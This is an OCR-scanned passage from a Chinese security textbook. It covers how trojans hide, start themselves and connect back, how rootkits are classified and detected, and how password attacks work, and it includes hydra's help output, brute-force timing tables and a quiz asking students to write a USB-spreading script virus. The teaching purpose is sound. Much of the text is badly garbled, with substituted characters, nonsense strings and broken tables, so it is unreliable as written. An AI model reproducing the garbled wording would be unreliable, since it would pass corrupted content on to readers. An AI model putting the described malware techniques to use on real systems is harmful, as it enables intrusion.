址 和 密码 ,用 来 发 送 包 含 蠕虫 代码 的 邮件 以 此 进行 传播 。 它 还 可 以 通过 用 户 在 站 点 下 载 感 


(2) 防治 案 略 。 利 用 特征 匹配 和 网 络 黑 洞 等 手段 来 制定 监测 防范 宁 略 。 

获得 系统 控制 权 是 师 虫 人 侵 的 前 担 。“ 琵 猫 烧 和 理 ” 师 虫 在 局 域 网 内 可 以 通过 弱 口 令 狂 洞 
进行 传播 ,一 旦 成 功 就 会 控制 目标 主机 开始 新 一 轮 攻 击 。 因 此 ,计算 机 用 户 应 该 尽量 避免 用 
户 名 默认 或 密码 为 空 , 以 增 蝇 主机 的 安全 性 。 同 时 ,如 有 果 能 够 合理 控制 程序 访问 系统 客体 的 
操作 , 则 程序 对 系统 的 危害 也 将 被 限制 。 通 过 安全 操作 系统 的 强制 存 取 控制 机 制 可 以 将 计 
算 机 系统 划分 为 系统 管理 空间 ,用户 空间 和 你 护 空间 。 强 制 存 取 控 制 机 制 将 系统 用 户 划分 
为 普通 用 户 和 系统 管理 员 。 系 统管 理 空 间 不 可 以 被 普通 用 户 读 写 ,用 户 空间 的 应 用 程序 和 
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数据 用 户 可 以 进行 读 写 ,普通 用 户 对 保护 空间 的 程序 和 数据 只 可 读 不 可 写 。 从 而 限制 了 “网 
络 蠕虫 ”的 传播 。 


5.5.3 上 典 型 特 党 伊 木 马 攻击 与 防 沁 


1. 木马 攻击 技术 

在 设计 木马 时 ,必须 考虑 的 因素 有 以 下 几 点 ,首先 隐蔽 性 要 好 ,其 次 要 顺利 实现 客户 端 
与 服务 冀 端 的 通信 ,最 后 还 要 有 其 他 需要 的 功能 。 综 上 所 述 , 木 马 的 设计 者 重点 会 采用 以 下 
技术 。 

(1) 隐 着 技术 。 木 马 的 服务 兹 为 了 防止 发 现 问 要 进行 隐藏 。 早 期 隐藏 技术 相对 人 简单。 
从 在 任务 栏目 里 隐 着 程序 到 现在 采用 了 内 核 插 入 式 的 散 入 方式 ,利用 十 程 插 入 线程 技术 , 骨 
A DLL 线程 ,或 者 挂 接 PSAPI 等 隐藏 技术 ,实现 木马 的 隐藏 ,甚至 在 Windwos NT/2000 环 
境 下 ,都 能 达到 良好 的 隐藏 效果 。 

木马 有 伪 隐 藏 和 真 隐 涛 两 种 实现 隐藏 的 方式 。 伪 隐藏 是 指 让 仍然 存在 的 程序 进程 消失 
在 进程 列表 中 ,把 木马 服务 融 闪 的 程序 注册 为 一 个 服务 就 可 以 胡 效 。 但 是 只 适用 Windows 
9x 系统 。 在 Windows NT/2000 "P, WAT LAE FH. API 的 拦截 技术 ,建立 一 个 后 台 的 系统 钧 
于 ,拦截 PSAPI 的 EnumProcessM 等 相关 图 数 从 而 来 实现 对 进程 和 服务 的 遍历 调用 控制 ， 
当 检 测 到 PID 为 木马 的 服务 疾病 进程 的 时 候 进 行 了 是 接 跳 过 ,实现 隧 沽 。 丰 隐藏 是 指 木 马 的 
服务 希 程序 运行 后 ,不 产生 新 的 进程 和 服务 ,而 是 完全 融 进 内 核 。 真 隐藏 的 方法 一 般 及 用 以 
下 方法 。 

CD 十 程 线程 插入 拉 术 ;: 将 要 实现 的 功能 程序 做 成 一 个 的 线程 ,在 运行 时 日 动 插入 到 进 
程 中 。 它 使 得 程序 不 以 进程 或 服务 的 方式 工作 进而 彻底 消失 ，。 

D 动态 链接 库 注 人 技术 (DLL 注入 技术 ); 一 个 动态 链接 库 文件 的 “木马 ”程序 ,通过 使 
用 远程 插入 拉 术 ,将 其 做 成 加 载 语 句 插 入 到 目标 进程 中 去 ,并 将 调用 动态 链接 库 孙 数 的 请 句 
插入 到 目标 进程 。 

© HokoingAPI iA: 通过 修改 API 函数 的 入 口 地 址 的 方法 来 欺骗 试图 列举 本 地 所 有 
进程 的 程序 。 

(2) AMR. ASC Re eK ea. AN SY Beh A Ar AS S Ba BT 
入 的 计算 机 每 次 局 动 时 都 能 日 动 运 行 , 故 使 用 各 种 方法 来 实现 日 加 载运 行 。 

木马 日 运行 的 第 见 方法 有 :加 载 程 厅 到 局 动 组 ;将 程 厅 局 动 路 径 写 到 注册 表 的 HKEY 
LOCAL MACHINE/SOFTIrARE/ Microsoft/Windows/Current Versions/Run 子 键 
RunOnce,RunService, RunOnceService 等 ); 修改 Boot. ini; 通过 注册 表 中 的 输入 法 键 值 和 下 
fe FE RR OI; 修改 Explorer. exe 局 动 参数 及 在 win. ini 和 systenL . ini 中 的 load 市 中 添加 
司 动 项 ; 在 Autoexec. bat 中 添加 程序 等 ; 或 者 采用 文件 关联 实现 木马 的 局 动 (冰河 木马 ); 
也 可 利用 DLL 木马 替换 系统 原 有 的 动态 链接 库 , 使 系统 在 装载 这 些 链接 库 时 启动 木马 
(GINA 木马 ) 。 

(3) 反 回 连接 拉 术 。 反 回 连 接 和 正 回 连接 在 本 质 上 的 区 别 并 不 大 。 在 正 回 连接 的 情况 
下 ,服务 冀 端 就 是 被 控制 喘 , 在 编程 实现 的 时 候 是 采用 服务 冀 端 的 编程 方法 的 ,而 控制 疾 是 
及 用 客户 痹 的 编程 方法 。 当 灯 用 反问 连接 技术 编程 时 ,就 是 服务 右 辣 米 用 客户 绵 的 编程 方 
法 ,而 将 客户 端 变 成 了 采用 服务 大 病 的 编程 方法 。 
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防火 墙 一 般 对 于 连 人 的 链接 会 严格 过 滤 ,但 对 于 连 出 的 却 不 会 严格 防范 。 反 弹 端 口 型 
木马 采用 反 向 连接 技术 ,服务 器 端 ( 被 控制 端 ) 用 主动 端口 ,客户 端 (控制 端 ) 用 被 动 端口 。 被 
植 和 人 反弹 木马 服务 器 端的 计算 机 定时 监测 客户 端的 存在 ,发 现 客户 端 上 线 立 即 弹 出 端口 主 
动 连接 客户 痪 打开 的 主动 端口 。 

(4) 端口 复 用 技术 。 在 Winsock 的 实现 中 ,对 于 服务 器 的 绑 定 是 可 以 多 重 绑 定 的 ,原则 
上 是 谁 的 指定 最 明确 则 将 包 递 交 给 谁 , 且 没有 权限 之 分 。 

一 个 木马 绑 定 到 一 个 合法 存在 的 端口 上 进行 隐藏 ,通过 特定 的 包 格 式 判 断 如 果 是 月 
己 的 包 则 处 理 ,否则 通过 127. 0.0. 1 的 地 址 区 给 真正 的 服务 融 应 用 进行 处 理 。 

© 一 个 木马 在 低 权 限 用 户 上 绑 定 高 权限 的 服务 应 用 的 端口 进行 嗅 探 。 

(5) 数据 传输 技术 。 木 马 常 用 TCP、UDP 协议 进行 传递 数据 ,但 隐蔽 性 比较 差 , 容 易 查 
到 。 但 是 可 以 采用 以 下 方法 躲避 这 种 侦察 。 

一 种 方法 是 将 木马 通过 连接 绑 定 了 通信 的 通用 端口 上 发 送信 息 。 缺 点 是 木马 在 等 竺 和 
运行 的 过 程 中 始终 由 一 个 和 外 界 联系 的 端口 打开 。 

男 一 种 办 法 是 使 用 ICMP fi, ICMP 报 文 由 系统 内 核 或 进程 直接 处 理 而 不 通过 端 
口 ,防火 墙 一 般 不 会 对 ICMP ECHOREPLY 报 文 进行 过 滤 ,否则 主机 无 法 对 外 进行 ping 

2. 木马 防范 技术 

目前 防范 木马 的 手段 有 两 种 ,依靠 杀毒 软件 和 网 络 防 火 墙 。 和 杀毒 软件 主要 依靠 木马 特 
征 和 修改 行为 特征 来 识别 木马 ,而 防火 墙 软件 主要 通过 对 网 络 通 信 的 控制 实现 对 木马 通信 
的 封锁 。 目 前 我 国 市 场 的 杀毒 软件 主要 为 瑞星 、 江 民 、 金 山 。 木 马 同 病毒 一 样 具 备 隐 蔽 性 、 
非 授 权 性 及 和 危害 性 等 特征 ,因此 ,和 党 稼 把 木马 的 简单 检测 和 清除 等 功能 集成 到 系统 中 。 

CD 杀毒 软件 技术 特点 。 

CD 未知 病毒 防治 技术 纵深 发 展 。 反 病毒 企业 采取 智能 行为 判断 技术 和 启发 式 查 毒 技 
术 人 研制 出 了 未 知 病毒 查 杀 技术 。 

病毒 防护 体系 日 趋 完 备 。 病 毒 防 护 体 系 就 是 通常 提 到 的 实时 监控 系统 ,目前 病毒 防 
护 体系 为 脚本 、 内 存 、 邮 件 、 文 件 多 种 监控 协同 工作 ,大 大 增强 预防 病毒 的 能 力 。 

O 立体 防毒 成 为 病毒 防护 新 标准 。 单 一 的 病毒 防治 手段 已 不 能 满足 用 户 的 防毒 需求 ， 
因此 出 现 了 立体 防 病毒 体系 ,将 计算 机 的 使 用 过 程 进行 逐 层 分 解 , 对 每 一 层 进行 分 别 控 制 和 
管理 ,从 而 达到 病毒 整体 防护 的 效果 。 

(2) 防火 墙 软件 技术 特点 。 防 火 墙 具有 较 强 的 抗 攻 击 能 力 。 防 火 墙 有 以 下 几 个 阶段 。 

O 包 过 滤 技 术 。 包 过 滤 防 火 墙 工作 在 网 络 层 对 数据 包 的 源 及 目的 IP 具有 识别 和 控制 


作用 ,在 传输 层 识别 数据 包 是 TCP 还 是 UDP 及 所 用 的 端口 信息 。 目 前 的 路 由 需 、 一 些 交 换 


机 和 操作 系统 都 已 经 具有 包 过 滤 控 制 的 能 力 。 

由 于 只 是 分 析 数 据 包 的 IP ehk, TCP/UDP 协议 .端口 , 包 过 滤 防 火 墙 的 处 理 速 度 相 对 
较 快 ,并 且 易 于 配置 。 但 对 反问 连接 型 木马 的 阻 断 则 没有 什么 效果 。 

O 应 用 代理 网 天 技术 。 应 用 代理 网 关 防 火 墙 彻 底 将 内 网 与 外 网 的 直接 通信 阳 断 ,内 网 
用 户 对 外 网 的 访问 转换 为 防火 墙 对 外 网 的 访问 ,结果 由 外 网 传 到 防火 墙 再 转发 给 内 网 用 户 。 
所 有 通信 都 必须 经 应 用 层 代理 软件 转发 。 

O 状态 监测 技术 。 数 据 包 并 不 是 独立 的 ,而 是 前 后 之 间 有 着 密切 的 状态 联系 , 故 产生 
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了 状态 监测 技术 。 


状态 监测 防火 墙 握 弃 了 包 过 滤 防 火 墙 仅 考查 数据 包 的 IP 地 址 等 几 个 参数 ,而 不 关心 数 
据 包 连接 状态 变化 的 缺点 ,在 防火 墙 的 核心 部 分 建立 状态 连接 表 , 并 将 进出 网 络 的 数据 当成 
一 个 个 的 会 话 ,利用 状态 表 跟 足 每 一 个 会 话 状 态 。 状 态 监测 对 每 一 个 包 的 检查 不 仅 根 据 规 
则 表 ,还 包括 了 数据 包 是 否 符合 会 话 所 处 的 状态 ,因此 提供 完整 的 对 传输 层 的 控制 能 力 。 

个 人 防火 墙 。 个 人 防火 墙 采 用 了 一 种 面 癌 应 用 程序 的 过 滤 技 术 , 这 种 技术 对 采用 反 
弹 端 口技 术 的 木马 有 一 定 的 效用 。 但 随 看 线程 注入 式 木 马 的 出 现 , 访 问 网 络 时 防火 墙 认 为 
是 宿主 程序 访问 网 络 ,一 般 不 予 阻拦 。 

(3)“ 系 统 级 深度 防护 和 立体 联动 防毒 ”技术 。 江 民 公 司 推出 新 的 防 杀 病毒 的 技术 , 即 
“系统 级 深度 防护 和 立体 联动 防毒 ”技术 ,由 三 大 技术 来 应 对 , 即 “ 驱 动 级 编程 技术 ”系统 级 
深度 防护 技术 ”立体 联动 防 杀 技术 ”, 用 户 在 杀毒 软件 上 可 以 自动 识别 是 否 安装 了 江 民 黑客 
防火 墙 ,并 可 控制 防火 墙 的 开启 、 关 闭 和 设置 安全 级 别 , 实 现 立体 联动 防毒 功能 ,在 过 到 混合 
型 病毒 后 ,防火 墙 规则 库 、 杀 毒 软件 病毒 库 同步 升级 ,彻底 防范 类 似 “ 冲 击 波 “震荡 波 ” 等 病 
毒 的 攻击 。 


5.5.4 H Rootkit 攻击 与 防范 


1，Rootkit 的 定义 

Rootkit 的 概念 出 现 于 20 世纪 90 年 代 初 ,是 用 来 剑 持 系统 最 高 权限 的 工具 集 。 

TE Rootkit 之 前 ,必须 先 获 取 目 标 系 统 的 超级 用 户 权 限 。Rootkit FPA BE AB H iih 
者 攻破 系统 ,而 是 使 攻击 者 能 重新 获取 系统 超级 用 户 权 限 的 技术 。 目 前 存在 监听 网 络 数据 、 
破解 密码 、 祝 取 管 理 员 密 码 等 超级 用 户 访问 权限 的 方法 。 

Rootkit 提供 的 主要 功能 如 下 。 

(1) 保持 对 系统 的 访问 权限 : 通过 预 留 后 门 来 保持 访问 。 

(2) 攻击 其 他 系统 : 出 现 了 用 于 攻击 其 他 系统 的 本 地 攻击 工具 和 远程 攻击 工具 两 种 。 
本 地 攻击 工具 是 重新 获取 主机 的 管理 员 权 限 ,代表 有 本 地 密码 嗅 探 天 和 解密 需 ; 十 程 攻击 
工具 是 将 目标 主机 作为 一 个 跳板 ,攻击 网 络 上 的 其 他 主机 。 

(3) 隐藏 攻击 痕迹 : Rootkit 应 具备 隐藏 攻击 信息 的 功能 ,能 修改 或 删除 日 志文 件 、 隐 
沽 相关 文件 进程 通信 和 链接 等 。 

2. Rootkit 的 攻击 过 程 

为 了 对 Rootkit 的 攻击 过 程 有 更 次 入 的 了 解 ,下 面 将 描述 Rootkit 攻击 系统 的 几 个 关键 

CD 收集 目标 主机 的 信息 。 首 先 ,对 目标 主机 进行 自动 扫描 ,收集 信息 。 例 如 ,分 析 主 
机 安 痛 的 系统 .能 否 匿名 登录 能 否 用 Telnet 连接 等 ,从 而 发 现 漏洞 。 

(2) 获取 目标 主机 的 超级 权限 。 利 用 漏洞 ,采取 缓冲 区 洲 出 等 手段 获取 超级 用 户 访 问 
权限 。 

(3) 在 目标 主机 上 安 Rootkit。 攻 击 者 获取 Root 权限 后 ,可 通过 隐蔽 的 网 络 端口 将 
Rootkit 工具 包 加 载 到 目标 主机 中 。 还 可 不 断 将 计算 机 病毒 、 键 盘 记 录 融 等 工具 经 由 同样 病 
口上 传 至 目标 主机 。 最 后 攻击 者 只 需要 执行 Rootkit 安 六 脚本 ,所 有 工具 的 安 汶 就 能 完成 。 
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(4) 清除 Rootkit KW. WR Rootkit RÆ Rootkit 任务 的 关键 ,完成 Rootkit LX 
后 ,通过 删除 文件 .日志 等 方式 清除 人 侵 信 息 。 
(5) 操纵 目标 主机 。 攻 击 者 在 目标 主机 上 成 功 安 痛 Rootkit, 驶 能 在 管理 员 副 无 察觉 的 
情况 下 长 期 控制 系统 ,可 以 操纵 这 台 目 标 主 机 执行 病毒 传播 ,拒绝 服务 攻击 等 非法 活动 。 
3. Rootkit 的 分 类 
根据 对 操作 系统 攻击 对 象 所 处 位 置 的 不 同 , 可 将 Rootkit 分 为 以 下 几 类 ,如 图 5-5 所 示 。 


| (1) 应 用 级 Rootkit 又 称 为 传统 Rootkit ,是 最 早出 现 
| 为 核 级 hl 的 一 类 Rootkit 。 
| 混合 型 Rootkit 
Rootkit et ee RE. 将 用 户 层 的 系统 
— | 具 , fll /bin/ls, /bin/ps./bin/netstat "Er 1 JN, 3E zs Hy fe 


AREE Bb ESL ESSERE FX BREA. DEE H 
de Rootkit 相关 的 所 有 信息 过 BANER, 
5-5 Rootkit 分 类 示意 图 典型 的 应 用 级 Rootkit 有 TOrn、WOOtkit lion $i 
E lrk rootkit 等 ,应 用 级 Rootkit 技术 已 还 渐 不 被 采用 。 

(2) 内 核 级 Rootkit 是 指 人 侵 到 操作 系统 内 核 层 的 的 恶意 软件 。 操 作 系 统 内 核 处 于 整 
个 系统 的 最 确 层 ,被 认为 是 系统 中 最 基本 的 部 分 , 像 文 件 系统 .进程 调度 .存储 管理 .系统 幸 
用 等 任务 都 是 在 系统 内 核 中 实现 的 。 内 核 级 Rootkit 通常 修改 或 替换 内 核 中 的 数据 结构 或 
员 数 (如 中 汤 处 理 限 数 、 系 统 调 用 、 文 件 系 统 等 )。 

目前 最 普 过 的 攻击 目标 是 系统 调用 ,按照 实现 攻击 手段 ,可 以 把 系统 调用 的 Rootkit 分 
为 以 下 几 类 : 重 定 问 系 统 调 用 表 的 Rootkit 修改 系统 调用 表 的 Rootkit, 修改 系统 调用 的 
Rootkit 。 

HEY AY A EZR Rootkit 有 knark adore, sucKIT,zk 等 ,里 同属 于 内 核 层 的 Rootkit, 但 
这 些 Rootkit AY SOLER AFF AS BIA. 

(3) 设备 级 Rootkit 是 一 种 以 计算 机 设备 为 目标 的 攻击 技术 ,这 些 设备 包括 BIOS, NJ 

卡 .声卡 .人 硬盘 控制 希 等 。 所 有 这 些 设备 都 能 通过 程序 与 系统 进行 交互 ,因此 一 旦 这 些 设备 
"CU S Rootkit, A Bcc MIRA n] Bea EMIT ASN IE s LE. 

(4) 男 外 存在 一 些 Rootkit. W ze FE HEV DU Ua TE 88 P HJ Rootkit ,其 攻击 对 象 不 属于 应 
用 层 内核 层 或 设备 层 。 

(5) 同一 个 Rootkit 的 攻击 目标 有 可 能 存在 于 多 个 层 。 美 国 乔 治理 工大 学 搭建 的 蜜 鳅 
就 兽 捕 获 到 一 种 名 为 r.tgz 的 混合 型 Rootkit, 它 包含 了 应 用 层 和 内 核 屋 Rootkit, 

4. Rootkit 防范 

在 Linux 下 防范 Rootkit 最 有 效 的 方法 是 定期 对 重要 系统 文件 的 完整 性 进行 核查 ,入 
用 的 核查 工具 有 Zeppoo, Rootkit Hunter 和 Chkrootkit。 

其 中 ,Zeppoo 可 以 检测 隐 天 的 系统 任务 .模块 、syscalls、 亚 意 符 号 和 隐藏 的 连接 。 让 
Linux 系统 管理 员 根 据 Zeppoo A PLAY Eso BJ AE TA B e FE oe I ISTE Fe FP Linux 系统 中 存 
fr Rootkits, 

Rootkit Hunter 工具 主要 执行 以 下 测试 。 

(1) MD5 校 验 测试 ,检测 是 否 存 在 改动 过 的 文件 。 
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(2) 对 Rootkits 使 用 的 二 进 制 和 系统 工具 文件 进行 检测 。 

(3) 对 特洛伊 程序 的 特征 码 进行 检测 。 

(4) 对 大 多 常用 程序 的 文件 异常 属性 进行 检测 。 

(5) 对 系统 进行 相关 的 测试 。 

(6) 对 混杂 模式 下 的 接口 和 后 门 程序 常用 的 端口 进行 扫描 。 

(7) 对 配置 .日 志文 件 及 隐藏 文件 等 进行 检测 。 

(8) 对 稍 用 奖 口 应 用 程序 进行 版 本 测试 。 

完成 上 面 的 检测 后 , 屏 希 即 可 显示 扫描 结果 : 可 能 被 感染 的 文件 不 正确 的 MDS 校 验 
文件 和 易 被 感染 的 应 用 程序 。 

除了 与 Rootkit Hunter 相同 的 测试 外 ,Chkrootkit 还 对 一 些 重要 的 二 进 制 文件 进行 检 
测 ,如 搜索 入 侵 者 已 更 改 的 日 志文 件 的 特征 信息 等 。 


5.6 本草 小 结 


亚 意 代码 是 信息 系统 安全 的 重要 威胁 之 一 。 本 章 首先 对 恶意 代码 的 定义 、 亚 意 代 码 存 
在 的 原因 ,传播 途径 等 进行 了 分 析 , 同 时 对 恶意 代 但 的 攻击 行为 进行 了 刻画 ,给 出 了 恶意 代 
码 的 攻击 模型 。 然 后 总 绪 分 析 了 目前 恶意 代码 实现 的 关键 技术 ,如 生存 技术 、 攻 击 技 术 、 模 
糊 变 化 技术 .隐蔽 技术 等 。 接 下 来 本 和 草 给 出 了 恶意 代码 的 分 析 技 术 方 法 体系 ,对 静态 分 析 和 
动态 分 析 两 种 方法 进行 详细 介绍 。 最 后 描述 了 和 典型 恶意 代码 的 攻击 与 防范 扩 术 。 


导 题 5 


1. 关于 网 页 中 的 恶意 代码 ,下 列 说 法 错误 的 是 ( 
A. 网 页 中 的 恶意 代码 只 能 通过 LE 浏览 器 发 挥 作用 
B. 网 页 中 的 恶意 代码 可 以 修改 系统 注册 表 
C. 网 页 中 的 恶意 代码 可 以 修改 系统 文件 
D. 网 页 中 的 恶意 代码 可 以 穷 取 用 户 的 机 密 性 文件 
2. 以 下 对 木马 阐述 不 正确 的 是 ( 
A. 木马 可 以 日 我 复制 和 传播 
B. EK B up WA BEP BET 
C. 有 些 木 马 可 以 对 目标 主机 上 的 文件 进行 任意 操作 
D. 木马 是 一 种 恶意 程序 ,它们 在 窒 主 主机 上 运行 ,在 用 户 毫 无 察觉 的 情况 下 ,让 攻 
击 者 获得 了 远程 访问 和 控制 系统 的 权限 
3. 计算 机 病毒 是 ( ) 。 


A. 被 损坏 的 程序 D. f PB S 
C. 一 段 特制 的 程序 D. ats Hr EAE 
4. 木马 程序 的 最 大 危害 在 于 它 ( D. 
A. 记录 键盘 信息 B. $i EUH P fei 


C. 破坏 软 使 件 系统 D. 阻塞 网 络 
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5. 计算 机 病毒 的 特点 是 ( — D. 


A. 传播 性 \ 浴 估 性 、 破 坏 性 B. 传播 性 \ 破 坏 性 、 易 读 性 
C. 潜伏 性 破坏 性 、 易 读 性 D. 传播 性 、 浴 伏 性 、 安 全 性 


6. 通过 Java Script、Applet、ActiveX( 三 者 选 一 ) 编 辑 的 脚本 程序 修改 TE. DR 默认 
主页 被 修改 ; IE 标题 栏 被 添加 非法 信息 。 
7. 编写 一 个 脚本 病毒 ,扫描 是 否 存 在 U 盘 , 如 果 存 在 ,将 病毒 写 到 U EEL. 


CH AP TER 6 


4 攻击 第 6 章 


6.1 第 用 的 口令 攻击 技术 


6.1.1 口令 安全 分 析 


口令 是 最 为 普遍 应 用 的 安全 机 制 ,而 口令 保护 机 制 的 安全 性 依赖 多 个 方 
面 的 因素 。 概 括 地 说 ,口令 的 安全 威胁 有 以 下 几 个 方面 。 

(OD 用 户 设 置 口令 简单 , 容 多 受到 字典 式 攻击 。 

(2) 用 户口 令 在 网 络 上 明文 传输 ,导致 用 户 的 口令 很 容易 被 监听 。 

(3) 用 户口 令 在 终端 机 上 存放 ,容易 被 黑客 程序 收集 。 

随 看 计算 机 技术 的 发 展 , 口 令 攻击 从 简单 的 猜测 攻击 发 展 到 利用 高 性 能 
计算 技术 来 实施 口令 攻击 。 根 据 实 验 数据 ,不 同 字 和 人 符 长 度 的 密码 破解 所 需 的 
时 间 差 别 较 大 ,由 4 位 数字 或 字符 构成 的 密码 破解 仅 需 要 5 秒 ,8 位 数字 或 字 
符 构成 的 密码 破解 需 耗 费 21 个 月 左右 。 

B eS A) Z., el bs EB) The Hacker’s Choice 开发 
一 个 破解 口令 专用 工具 集合 ,该 工具 采用 并 行 登录 技术 , 文 持 快速 在 线 破解 ， 
hydra 运行 示意 图 如 图 6-1 所 示 。 


6.1.2 口令 攻击 方法 


d) 字典 攻击 。 攻 击 者 根据 硅 干 知识 编写 口令 字典 ,然后 依据 该 字典 通 
过 猜测 获得 用 户 的 口令 。 

(2) 骏 力 攻击 。 攻 击 者 通过 穷尽 口令 空间 获得 用 户口 令 , 根 据 口令 的 长 
E .口令 的 特征 .各 种 字符 组 合 方式 选择 某 个 口令 空间 进行 攻击 。 例 如 ,假定 
已 知 革 用户 的 口令 全 为 数字 , 且 长 度 为 6 个 字符 , 则 该 用 户 的 口令 空间 大 小 
为 1000 000。 随 看 用 户 选 择 口令 长 度 的 增加 ,以 及 口令 设置 复杂 度 的 提高 ， 
攻击 计算 花费 的 时 间 就 越 长 。 表 6-1 给 出 了 Webdon 公司 假定 暴力 破解 计算 
环境 是 单机 ,又 力 破解 速度 为 500 000 个 口令 / 秒 , 统 计 不 同 口令 字 用 其 力 破 
解 所 花费 的 时 间 。 








PD: Nhydra—S . 4-win>. \hydra.exe 
Hydra v5.4 [http://uww.the.org] c) 2666 by van Hauser A THO <vh@thc .org> 





Syntax: .“hydra E[I[I-1 LOGIM:-L FILE] [-p PASS I-P FILEI]] i L[-C FILE]] [-e ns] 
[-o FILE] [-t TASKS] [-M FILE [-T TASKS11 [-w TIME] [-f1 [-s PORT] [-81] I[-uU] 
server service [OPT] 





restore a previous aborted/crashed session 
connect via SSL 
E PORT if the service is on a different default port. define it here 
LOGIN or -L FILE login with LOGIN name, or load several logins from FILE 
—p PASS or -P FILE try password PASS. or load several passwords from FILE 
S: additional checks, "n" for null password, "s" try login as pass 
> FILE colon seperated “login:pass" format. instead of —-L/-P options 
FILE server list for parallel attacks. one entry per line 
FILE write found login/password pairs to FILE instead of stdout 


exit after the first found login/password pair Cper host if —M) 
TASKS run TASKS number of connects in parallel “default: 165 
4 TIME defines the max wait time in seconds for responses Cdefault: 36> 
| ,/ -U verbose mode ” show login+pass combination for each attempt 
server the target server Cuse either this OR the -M option? 


SEVICE the service to crack. Supported protocols: telnet ftp pop3[-nt 1m] 
imap(€-ntlm] smb smbnt httpl[sJ]-<headiget?+ http-<get ipost?-form http-proxy cisco 
cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 
rexec rlogin pcnfs snmp rsh cvs sun icq sapr3 ssh2 smtp-auth(-ntlm] peanywhere 
teamspeak sip vmauthd 

OPT some service modules need special input “see READMET> 


Use HYDRA PROSV HTIP^/HVYVDRA PROSV CONNECT and HVDHR PROXV RUTH env for a proxy. 
Hydra is a tool to guess/crack valid login/password pairs —- use allowed only 
for legal purposes? If used commercially, tool name. version and web address 
must be mentioned in the report. Find the newest version at http: //wuww.the org 


图 6-1 hydra 运行 示意 图 


表 6-1 暴力 破解 口令 实践 统计 (数据 来 源 Webdon 公司 ) 
密码 类 型 


小 写字 母 和 数字 大 小 写字 母 数字 ,符号 ,大 小 写字 母 
L— —1 22 — 2 分 
EXT 
IX 
7 4 年 
8 463 年 
9 44 530 年 


(3) 口令 监听 。 攻 击 者 利用 口令 在 网 络 上 明文 传递 的 漏洞 ,通过 专用 的 工具 进行 穷 听 。 
(D 综合 攻击 。 攻 击 者 利用 口令 验证 机 制 上 的 弱点 ,通过 反 编 译 ,获取 破解 口令 的 信 
E. 然后 进行 口令 破解 。 


6.1.3 ”口令 字典 构造 


目前 ,因特网 上 有 一 些 口令 字典 可 供 下 载 , 包 含 的 条 目 从 1 万 到 几 十 万 条 不 等 。 口令 字 

- 般 赛 括 了 篆 用 的 单词 。 也 有 很 多 专门 生成 字典 的 程序 ,如 dictmake,txt2dict 等 。 
dictmake 为 例 : 启动 程序 后 ,计算 机 要 求 输入 最 大 和 最 小 口令 长 度 . 口 令 包含 的 大 小 写字 
TBS ASH 是否 含有 标点 符号 及 特殊 字符 等 一 系列 参数 。 根 据 实 际 情 况 输入 之 后 ， 
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计算 机 会 按 给 定 条 件 日 动 将 其 中 所 有 组 合 方式 列 出 来 存 到 文件 中 ,这 个 文件 就 是 可 能 的 口 


令 字典 。 口 令 字典 的 构造 方法 如 表 6-2 所 示 。 
表 6-2 口令 字典 构造 方法 


WM) ED | Co | Co | Co | Co | CO | F2 NT P2 | 2 NM) P2 | F2 | P2 | | | 一 || lee 


口令 类 型 


， 规范 单词 

. 反 写 规范 词 

. 词 首 正 规 大 写 

. 反 拼 写 与 反 大 写 

. 反 拼 写 与 非 正 规 大 瑟 


缩写 


-WRAS 

. 缩写 后 带 点 

. RE 

0. 专 有 名 词 缩写 , 带 点 

. 专 有 名 词 缩写 ,不 全 大 写 
. 姓 

.名 

. 所 有 格 

. 动词 变化 

. 复数 

. 法 律 用 语 

. 地 名 ( 城 / 街 / 山 / 河 等 名 称 ) 
. 生物 词汇 

. 医药 词汇 

. 技术 词汇 

.商品 

. 用 户 标识 符 

. 反 写 用 户 标识 符 

. BAP ik fF 

. 截 短 的 用 户 标识 符 

. 串 接 用 户 标识 符 并 截 短 
. 只 用 单字 母 构 成 的 通行 字 
. 键盘 上 的 字母 

. 文化 名 人 

. 年 月 日 

. 电话 号 码 

. 邮政 编码 

. 各 种 证 件 号 

. 门牌 号 

. EN» 


X i 
game 
emag 
Password 
drowssaP 
drowssaP 
USA 
U.S. A 
USA. 
etc. 
Ph. D. 
MHz 
Bush 
George 
Bob's 
see-Sees, saw, seen 
books 
legal 
New York 
dog 
vitamin 
modem 
beer 
woodc 
cdoow 
woodc-woodc 
wood 
woodcwood 
aaaaa 
asdig 
Beethoven 
920816 
114119 
D-1000 
750034 
A76 
83k051 
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6.1.4 网 络 口令 破解 


网 络 服务 口令 攻击 和 常用 于 远程 在 线 攻 击 , 它 的 主要 工作 流程 如 下 。 

第 一 步 ,建立 与 日 标 网 络 服务 的 网 络 连 接 。 

第 二 步 ,选取 一 个 用 户 列表 文件 及 字典 文件 。 

第 三 步 ,在 用 户 列 表 文 件 及 字典 文件 中 ,选取 一 组 用 户 和 口令 , 按 网 络 服务 协议 规定 ,将 
用 户 名 及 口令 发 送 给 目标 网 络 服务 端口 。 

第 四 步 ,检测 远程 服务 返回 信息 ,确定 口令 尝试 是 否 成 功 。 

第 五 步 ,再 取 男 一 组 用 户 和 口令 ,重复 循环 试验 ,直至 口令 用 户 列表 文件 及 字典 文件 选 


取 完 毕 。 
6.1.5 口令 嗅 探 器 


网 络 星 探 需 是 用 来 徊 听 流 经 网 络 接口 的 信息 ,获取 用 户 的 会 话 信息 ,如 认证 信息 .商业 
机 密 。 通 常 ,计算 机 系统 只 接收 目的 地 址 是 目 己 的 网 络 包 ,其 他 包 痢 被 忽略 。 但 有 很 多 和 情 
况 ,计算 机 的 网 络 接口 可 能 接收 到 的 目的 地 址 并 非 指 阿 自 己 的 网 络 包 ,在 完全 的 广播 子 网 
中 ,所 有 涉及 局 域 网 中 主机 的 网 络 通信 ,其 内 容 都 能 被 局 域 网 中 所 有 主机 接收 到 ,这 就 使 得 
网 络 禄 听 变 得 非 背 容易 。 目 前 的 网 络 吊 探 闫 大 部 分 是 基于 以 太 网 的 ,其 原因 在 于 以 太 网 广 
泛 地 应 用 于 局 域 网 。 网 络 咖 探 天 的 一 般 工 作 流 程 如 下 。 

(OD 打开 文件 描述 符 。 打 开 专 用 设备 、 网 络 接口 或 网 络 套 接 字 , 得 到 一 个 文件 描述 符 ， 
以 后 有 所 有 的 读 、 写 和 控制 部 会 针对 这 个 文件 描述 从。 

(2) 设置 混杂 模式 。 把 以 太 网 的 网 络 接口 设置 成 promiscuous mode. {ff € EY ATA iit 
过 网 络 介 质 的 信息 包 。 

